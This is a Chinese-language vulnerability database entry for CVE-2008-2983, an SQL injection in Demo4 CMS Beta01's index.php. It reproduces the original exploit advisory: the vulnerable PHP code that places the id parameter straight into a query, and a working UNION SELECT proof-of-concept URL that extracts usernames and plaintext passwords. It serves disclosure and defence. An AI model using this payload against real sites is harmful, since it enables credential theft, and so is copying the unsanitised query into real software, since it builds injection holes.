cwh_underground demo4_cms SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1115561 漏洞类型 SQL注入
发布时间 2008-06-23 更新时间 2008-07-02
CVE编号 CVE-2008-2983 CNNVD-ID CNNVD-200807-040
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/5914
https://www.securityfocus.com/bid/81012
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200807-040
|漏洞详情
Demo4CMS是一个简单的基于Mysql和php的内容管理系统。Demo4CMS01Beta的index.php中存在SQL注入漏洞,远程攻击者通过id参数来执行任意SQL命令。
|漏洞EXP
===============================================================
  Demo4 CMS (index.php id) Remote SQL Injection Vulnerability
===============================================================
 
  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'


AUTHOR : CWH Underground
DATE   : 23 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Demo4 CMS 
 VERSION     : Beta01
 VENDOR      : N/A
 DOWNLOAD    : http://downloads.sourceforge.net/demo4
#####################################################

--- Remote SQL Injection ---

-----------------------------
 Vulnerable File [index.php]
-----------------------------

@Line

   8:  if ($_GET['id']=="")
   9:  $id = $startpage;
  10:  else
  11:  $id = $_GET['id'];
  12:  database_connect();
  13:  $query = "SELECT * from content
  14:         WHERE id = $id";
  15:  $error = mysql_error();

---------
 Exploit
---------

[+] http://[Target]/[demo4_path]/index.php?id=[SQL Injection]


   **This exploits can get username and password (No Encryption)**

-------------
 POC Exploit
-------------

[+] http://192.168.24.25/demo4/index.php?id=-9999/**/UNION/**/SELECT/**/1,userid,3,4,password,username,7,8/**/FROM/**/pages_t_users


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-23]
|受影响的产品
Cwh Underground Demo4 Cms 01 Beta
|参考资料

来源:XF
名称:demo4cms-index-sql-injection(43291)
链接:http://xforce.iss.net/xforce/xfdb/43291
来源:MILW0RM
名称:5914
链接:http://www.milw0rm.com/exploits/5914